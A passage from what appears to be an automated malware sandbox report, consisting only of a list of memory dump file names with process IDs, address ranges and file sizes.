                    • memory/4184-293-0x000001F206FF0000-0x000001F206FF1000-memory.dmp
                      Filesize

                      4KB

                    • memory/4184-289-0x0000000000000000-mapping.dmp
                    • memory/4184-292-0x00007FF9738C0000-0x00007FF9742AC000-memory.dmp
                      Filesize

                      9.9MB

                    • memory/4200-334-0x0000000000000000-mapping.dmp
                    • memory/4200-344-0x00007FF9738C0000-0x00007FF9742AC000-memory.dmp
                      Filesize

                      9.9MB

                    • memory/4236-126-0x0000000000400000-0x0000000000498000-memory.dmp
                      Filesize

                      608KB

                    • memory/4236-127-0x000000000043FCC3-mapping.dmp
                    • memory/4236-129-0x0000000000400000-0x0000000000498000-memory.dmp
                      Filesize

                      608KB

                    • memory/4248-133-0x0000000000417A8B-mapping.dmp
                    • memory/4248-130-0x0000000000400000-0x0000000000439000-memory.dmp
                      Filesize

                      228KB

                    • memory/4248-137-0x0000000000400000-0x0000000000439000-memory.dmp
                      Filesize

                      228KB

                    • memory/4300-333-0x00007FF9738C0000-0x00007FF9742AC000-memory.dmp
                      Filesize

                      9.9MB

                    • memory/4300-328-0x0000000000000000-mapping.dmp
                    • memory/4304-57-0x0000000000000000-mapping.dmp
                    • memory/4316-136-0x0000000000400000-0x0000000000425000-memory.dmp
                      Filesize

                      148KB

                    • memory/4316-132-0x000000000041A684-mapping.dmp
                    • memory/4316-131-0x0000000000400000-0x0000000000425000-memory.dmp
                      Filesize

                      148KB

                    • memory/4396-65-0x0000000070B40000-0x000000007122E000-memory.dmp
                      Filesize

                      6.9MB

                    • memory/4396-62-0x0000000000000000-mapping.dmp
                    • memory/4416-297-0x0000000009680000-0x00000000096B3000-memory.dmp
                      Filesize

                      204KB

                    • memory/4416-348-0x0000000007390000-0x0000000007391000-memory.dmp
                      Filesize

                      4KB

                    • memory/4416-271-0x0000000072EA0000-0x000000007358E000-memory.dmp
                      Filesize

                      6.9MB

                    • memory/4416-341-0x00000000073A0000-0x00000000073A1000-memory.dmp
                      Filesize

                      4KB

                    • memory/4416-270-0x0000000000000000-mapping.dmp
                    • memory/4416-308-0x00000000097C0000-0x00000000097C1000-memory.dmp
                      Filesize

                      4KB

                    • memory/4416-307-0x0000000009660000-0x0000000009661000-memory.dmp
                      Filesize

                      4KB

                    • memory/4416-290-0x0000000008B30000-0x0000000008B31000-memory.dmp
                      Filesize

                      4KB

                    • memory/4416-278-0x00000000080F0000-0x00000000080F1000-memory.dmp
                      Filesize

                      4KB

                    • memory/4436-366-0x00007FF9738C0000-0x00007FF9742AC000-memory.dmp
                      Filesize

                      9.9MB

                    • memory/4436-351-0x0000000000000000-mapping.dmp
                    • memory/4452-240-0x0000000072EA0000-0x000000007358E000-memory.dmp
                      Filesize

                      6.9MB

                    • memory/4452-256-0x0000000004F60000-0x0000000004F65000-memory.dmp
                      Filesize

                      20KB

                    • memory/4452-244-0x0000000000520000-0x0000000000521000-memory.dmp
                      Filesize

                      4KB

                    • memory/4452-236-0x0000000000000000-mapping.dmp
                    • memory/4452-249-0x0000000004C70000-0x0000000004C71000-memory.dmp
                      Filesize

                      4KB

                    • memory/4452-254-0x0000000004DE0000-0x0000000004DF2000-memory.dmp
                      Filesize

                      72KB

                    • memory/4480-66-0x0000000000000000-mapping.dmp
                    • memory/4540-237-0x0000000005840000-0x0000000005841000-memory.dmp
                      Filesize

                      4KB

                    • memory/4540-229-0x0000000072EA0000-0x000000007358E000-memory.dmp
                      Filesize

                      6.9MB

                    • memory/4540-311-0x0000000005AD0000-0x0000000005AF4000-memory.dmp
                      Filesize

                      144KB

                    • memory/4540-226-0x0000000000000000-mapping.dmp
                    • memory/4540-309-0x0000000005AA0000-0x0000000005AC3000-memory.dmp
                      Filesize

                      140KB

                    • memory/4540-383-0x00000000075D0000-0x00000000075D1000-memory.dmp
                      Filesize

                      4KB

                    • memory/4540-230-0x0000000000FE0000-0x0000000000FE1000-memory.dmp
                      Filesize

                      4KB

                    • memory/4548-323-0x0000000000000000-mapping.dmp
                    • memory/4548-329-0x00007FF9738C0000-0x00007FF9742AC000-memory.dmp
                      Filesize

                      9.9MB

                    • memory/4560-332-0x0000000000000000-mapping.dmp
                    • memory/4560-339-0x00007FF9738C0000-0x00007FF9742AC000-memory.dmp
                      Filesize

                      9.9MB

                    • memory/4572-310-0x0000000000000000-mapping.dmp
                    • memory/4572-313-0x0000000072EA0000-0x000000007358E000-memory.dmp
                      Filesize

                      6.9MB

                    • memory/4580-345-0x0000000000000000-mapping.dmp
                    • memory/4580-361-0x00007FF9738C0000-0x00007FF9742AC000-memory.dmp
                      Filesize

                      9.9MB

                    • memory/4592-71-0x0000000070B40000-0x000000007122E000-memory.dmp
                      Filesize

                      6.9MB

                    • memory/4592-69-0x0000000000000000-mapping.dmp
                    • memory/4644-222-0x0000000000400000-0x0000000000420000-memory.dmp
                      Filesize

                      128KB

                    • memory/4644-225-0x0000000000400000-0x0000000000420000-memory.dmp
                      Filesize

                      128KB

                    • memory/4644-223-0x000000000041A684-mapping.dmp
                    • memory/4704-185-0x0000000000400000-0x0000000000434000-memory.dmp
                      Filesize

                      208KB

                    • memory/4704-188-0x0000000000400000-0x0000000000434000-memory.dmp
                      Filesize

                      208KB

                    • memory/4704-186-0x0000000000417A8B-mapping.dmp
                    • memory/4744-164-0x0000000000000000-mapping.dmp
                    • memory/4780-325-0x0000000000000000-mapping.dmp
                    • memory/4780-331-0x00007FF9738C0000-0x00007FF9742AC000-memory.dmp
                      Filesize

                      9.9MB

                    • memory/4824-252-0x0000000000000000-mapping.dmp
                    • memory/4840-210-0x0000000000000000-mapping.dmp
                    • memory/4904-162-0x0000000000000000-mapping.dmp
                    • memory/4956-161-0x00000000056A0000-0x00000000056A1000-memory.dmp
                      Filesize

                      4KB

                    • memory/4956-106-0x0000000000270000-0x0000000000271000-memory.dmp
                      Filesize

                      4KB

                    • memory/4956-160-0x0000000004FE0000-0x0000000005090000-memory.dmp
                      Filesize

                      704KB

                    • memory/4956-163-0x0000000005E80000-0x0000000005E8D000-memory.dmp
                      Filesize

                      52KB

                    • memory/4956-101-0x0000000000000000-mapping.dmp
                    • memory/4956-104-0x0000000070B40000-0x000000007122E000-memory.dmp
                      Filesize

                      6.9MB

                    • memory/5000-105-0x0000000000000000-mapping.dmp
                    • memory/5024-322-0x0000000000000000-mapping.dmp
                    • memory/5024-327-0x00007FF9738C0000-0x00007FF9742AC000-memory.dmp
                      Filesize

                      9.9MB

                    • memory/5040-349-0x00007FF9738C0000-0x00007FF9742AC000-memory.dmp
                      Filesize

                      9.9MB

                    • memory/5040-338-0x0000000000000000-mapping.dmp
                    • memory/5112-116-0x0000000000000000-mapping.dmp
                    • memory/5568-426-0x0000000000B70000-0x0000000000B71000-memory.dmp
                      Filesize

                      4KB

                    • memory/5568-447-0x0000000000000000-mapping.dmp
                    • memory/5568-449-0x0000000000000000-mapping.dmp
                    • memory/5568-451-0x0000000000000000-mapping.dmp
                    • memory/5568-453-0x0000000000000000-mapping.dmp
                    • memory/5568-455-0x0000000000000000-mapping.dmp
                    • memory/5568-457-0x0000000000000000-mapping.dmp
                    • memory/5568-459-0x0000000000000000-mapping.dmp
                    • memory/5568-461-0x0000000000000000-mapping.dmp
                    • memory/5568-463-0x0000000000000000-mapping.dmp
                    • memory/5568-465-0x0000000000000000-mapping.dmp
                    • memory/5568-468-0x0000000000000000-mapping.dmp
                    • memory/5568-470-0x0000000000000000-mapping.dmp
                    • memory/5568-472-0x0000000000000000-mapping.dmp
                    • memory/5568-474-0x0000000000000000-mapping.dmp
                    • memory/5568-476-0x0000000000000000-mapping.dmp
                    • memory/5568-478-0x0000000000000000-mapping.dmp
                    • memory/5568-480-0x0000000000000000-mapping.dmp
                    • memory/5568-482-0x0000000000000000-mapping.dmp
                    • memory/5568-484-0x0000000000000000-mapping.dmp
                    • memory/5568-486-0x0000000000000000-mapping.dmp
                    • memory/5568-488-0x0000000000000000-mapping.dmp
                    • memory/5568-490-0x0000000000000000-mapping.dmp
                    • memory/5568-492-0x0000000000000000-mapping.dmp
                    • memory/5568-445-0x0000000000000000-mapping.dmp
                    • memory/5568-495-0x0000000000000000-mapping.dmp
                    • memory/5568-443-0x0000000000000000-mapping.dmp
                    • memory/5568-441-0x0000000000000000-mapping.dmp
                    • memory/5568-437-0x0000000000000000-mapping.dmp
                    • memory/5568-433-0x0000000000000000-mapping.dmp
                    • memory/5568-429-0x0000000000000000-mapping.dmp
                    • memory/5568-502-0x0000000000000000-mapping.dmp
                    • memory/5568-504-0x0000000000000000-mapping.dmp
                    • memory/5568-427-0x0000000000000000-mapping.dmp
                    • memory/5568-424-0x0000000000000000-mapping.dmp
                    • memory/5568-508-0x0000000000000000-mapping.dmp
                    • memory/5568-510-0x0000000000000000-mapping.dmp
                    • memory/5568-512-0x0000000000000000-mapping.dmp
                    • memory/5568-514-0x0000000000000000-mapping.dmp
                    • memory/5568-516-0x0000000000000000-mapping.dmp
                    • memory/5568-518-0x0000000000000000-mapping.dmp
                    • memory/5568-520-0x0000000000000000-mapping.dmp
                    • memory/5568-522-0x0000000000000000-mapping.dmp
                    • memory/5568-524-0x0000000000000000-mapping.dmp
                    • memory/5568-526-0x0000000000000000-mapping.dmp
                    • memory/5568-528-0x0000000000000000-mapping.dmp
                    • memory/5568-530-0x0000000000000000-mapping.dmp
                    • memory/5568-532-0x0000000000000000-mapping.dmp
                    • memory/5568-534-0x0000000000000000-mapping.dmp
                    • memory/5568-421-0x0000000000AB0000-0x0000000000AB1000-memory.dmp
                      Filesize

                      4KB

                    • memory/5568-537-0x0000000000000000-mapping.dmp
                    • memory/5568-539-0x0000000000000000-mapping.dmp
                    • memory/5568-541-0x0000000000000000-mapping.dmp
                    • memory/5568-543-0x0000000000000000-mapping.dmp
                    • memory/5568-545-0x0000000000000000-mapping.dmp